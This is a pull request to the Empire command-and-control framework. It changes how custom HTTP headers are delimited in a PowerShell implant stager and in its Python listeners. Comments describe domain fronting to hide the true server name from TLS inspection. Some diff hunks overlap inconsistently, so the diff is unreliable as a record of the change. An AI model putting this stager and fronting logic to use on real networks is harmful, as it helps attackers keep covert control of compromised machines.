### PR TITLE
Fix splitting of custom headers with custom marker in http malleable listener

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,6 +14,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 -   Fixed background jobs for the python agent.
+-   Fixed powershell stager parsing of custom headers.
 
 ## [6.7.1] - 2026-07-25
 -   Updated Starkiller to v3.6.0

--- a/empire/server/data/agent/stagers/http_malleable/http_malleable.ps1
+++ b/empire/server/data/agent/stagers/http_malleable/http_malleable.ps1
@@ -1023,18 +1023,20 @@ function Start-Negotiate {
 
     # the User-Agent always resets for multiple calls...silly
     if ($customHeaders -ne "") {
-        $headers = $customHeaders -split ',';
+        $headers = $customHeaders -split '<HEND>';
         $headers | ForEach-Object {
             $headerKey = $_.split(':')[0];
             $headerValue = $_.split(':')[1];
 	    #If host header defined, assume domain fronting is in use and add a call to the base URL first
 	    #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
-	    if ($headerKey -eq "host"){
+            if ($headerKey -eq "host"){
                 try{$ig=$WC.DownloadData($s)}catch{}};
-            $wc.Headers.Add($headerKey, $headerValue);
+            $wc.Headers.Set($headerKey, $headerValue);
         }
     }
-    $wc.Headers.Add("User-Agent",$UA);
+    if ($UA -ne $null -and $UA -ne "") {
+        $wc.Headers.Set("User-Agent",$UA)
+    }
 
     # session id (8 bytes ASCII)
     $ID='00000000'
@@ -1107,19 +1109,23 @@ function Start-Negotiate {
 
     # the User-Agent always resets for multiple calls...silly
     if ($customHeaders -ne "") {
-        $headers = $customHeaders -split ',';
+        $headers = $customHeaders -split '<HEND>';
         $headers | ForEach-Object {
             $headerKey = $_.split(':')[0];
             $headerValue = $_.split(':')[1];
-	    #If host header defined, assume domain fronting is in use and add a call to the base URL first
-	    #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
-	    if ($headerKey -eq "host"){
+            #If host header defined, assume domain fronting is in use and add a call to the base URL first
+            #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
+            if ($headerKey -eq "host"){
                 try{$ig=$WC.DownloadData($s)}catch{}};
-            $wc.Headers.Add($headerKey, $headerValue);
+            $wc.Headers.Set($headerKey, $headerValue);
         }
     }
-    $wc.Headers.Add("User-Agent",$UA);
-    $wc.Headers.Add("Hop-Name",$hop);
+    if ($UA -ne $null -and $UA -ne "") {
+        $wc.Headers.Set("User-Agent",$UA)
+    }
+    if ($hop -ne $null -and $hop -ne "") {
+        $wc.Headers.Set("Hop-Name",$hop)
+    }
 
     # stage_2: ChaCha20-Poly1305 routing with AES/HMAC(SessionKey) body
     $chachaPkt2 = Build-ChaChaRoutingPacket -StagingKeyBytes $SKB -SessionId8 $ID -Language 1 -Meta 3 -Additional 0 -EncData $eb2

--- a/empire/server/listeners/http.py
+++ b/empire/server/listeners/http.py
@@ -587,7 +587,7 @@ class Listener:
                     if "cookie" in value[0].lower() and value[1]:
                         continue
                     remove += value
-                headers = ",".join(remove)
+                headers = "<HEND>".join(remove)
                 stager = stager.replace(
                     '$customHeaders = "";', f'$customHeaders = "{headers}";'
                 )

--- a/empire/server/listeners/http.py
+++ b/empire/server/listeners/http.py
@@ -529,7 +529,6 @@ class Listener:
         stagingKey = listenerOptions["StagingKey"]["Value"]
         workingHours = listenerOptions["WorkingHours"]["Value"]
         killDate = listenerOptions["KillDate"]["Value"]
-        customHeaders = profile.split("|")[2:]
 
         # select some random URIs for staging from the main profile
         stage1 = random.choice(uris)
@@ -578,19 +577,6 @@ class Listener:
                 "agent_public_cert_key": public_key_array,
             }
             stager = template.render(template_options)
-
-            # Patch in custom Headers
-            remove = []
-            if customHeaders != []:
-                for key in customHeaders:
-                    value = key.split(":")
-                    if "cookie" in value[0].lower() and value[1]:
-                        continue
-                    remove += value
-                headers = "<HEND>".join(remove)
-                stager = stager.replace(
-                    '$customHeaders = "";', f'$customHeaders = "{headers}";'
-                )
 
             if obfuscate:
                 stager = self.mainMenu.obfuscationv2.obfuscate(

--- a/empire/server/listeners/http_hop.py
+++ b/empire/server/listeners/http_hop.py
@@ -341,7 +341,6 @@ class Listener:
         staging_key = listener.options["StagingKey"]["Value"]
         workingHours = listener.options["WorkingHours"]["Value"]
         killDate = listener.options["KillDate"]["Value"]
-        customHeaders = profile.split("|")[2:]
         session_cookie = listener.options["Cookie"]["Value"]
 
         # select some random URIs for staging from the main profile
@@ -395,19 +394,6 @@ class Listener:
                 "agent_public_cert_key": public_key_array,
             }
             stager = template.render(template_options)
-
-            # Patch in custom Headers
-            remove = []
-            if customHeaders != []:
-                for key in customHeaders:
-                    value = key.split(":")
-                    if "cookie" in value[0].lower() and value[1]:
-                        continue
-                    remove += value
-                headers = "<HEND>".join(remove)
-                stager = stager.replace(
-                    '$customHeaders = "";', f'$customHeaders = "{headers}";'
-                )
 
             if obfuscate:
                 stager = self.mainMenu.obfuscationv2.obfuscate(

--- a/empire/server/listeners/http_hop.py
+++ b/empire/server/listeners/http_hop.py
@@ -404,7 +404,7 @@ class Listener:
                     if "cookie" in value[0].lower() and value[1]:
                         continue
                     remove += value
-                headers = ",".join(remove)
+                headers = "<HEND>".join(remove)
                 stager = stager.replace(
                     '$customHeaders = "";', f'$customHeaders = "{headers}";'
                 )

--- a/empire/server/listeners/http_malleable.py
+++ b/empire/server/listeners/http_malleable.py
@@ -666,7 +666,7 @@ class Listener:
 
             # patch in custom headers
             if profile.stager.client.headers:
-                headers = ",".join(
+                headers = "<HEND>".join(
                     [
                         ":".join([k.replace(":", "%3A"), v.replace(":", "%3A")])
                         for k, v in profile.stager.client.headers.items()

--- a/empire/server/listeners/port_forward_pivot.py
+++ b/empire/server/listeners/port_forward_pivot.py
@@ -386,7 +386,6 @@ class Listener:
         workingHours = listenerOptions["WorkingHours"]["Value"]
         killDate = listenerOptions["KillDate"]["Value"]
         host = listenerOptions["Host"]["Value"]
-        customHeaders = profile.split("|")[2:]
 
         # select some random URIs for staging from the main profile
         stage1 = random.choice(uris)
@@ -411,19 +410,6 @@ class Listener:
                 "stage_2": stage2,
             }
             stager = template.render(template_options)
-
-            # Patch in custom Headers
-            remove = []
-            if customHeaders != []:
-                for key in customHeaders:
-                    value = key.split(":")
-                    if "cookie" in value[0].lower() and value[1]:
-                        continue
-                    remove += value
-                headers = "<HEND>".join(remove)
-                stager = stager.replace(
-                    '$customHeaders = "";', f'$customHeaders = "{headers}";'
-                )
 
             stagingKey = stagingKey.encode("UTF-8")
             stager = listener_util.remove_lines_comments(stager)

--- a/empire/server/listeners/port_forward_pivot.py
+++ b/empire/server/listeners/port_forward_pivot.py
@@ -420,7 +420,7 @@ class Listener:
                     if "cookie" in value[0].lower() and value[1]:
                         continue
                     remove += value
-                headers = ",".join(remove)
+                headers = "<HEND>".join(remove)
                 stager = stager.replace(
                     '$customHeaders = "";', f'$customHeaders = "{headers}";'
                 )


### PR DESCRIPTION
## Describe your changes

- Fixed headers splitting on commas, it now uses a custom marker as header end
- Removed no-op replace from http.ps1

## Issue ticket number and link (if there is one)

https://github.com/BC-SECURITY/Empire/issues/829

## Checklist before requesting a review
- [x] I have performed a self-review of my code
- [-] If it is a core feature, I have added thorough tests.
- [X] I have added an entry to `CHANGELOG.md`
- [-] I have updated the documentation in `docs/` (if applicable)
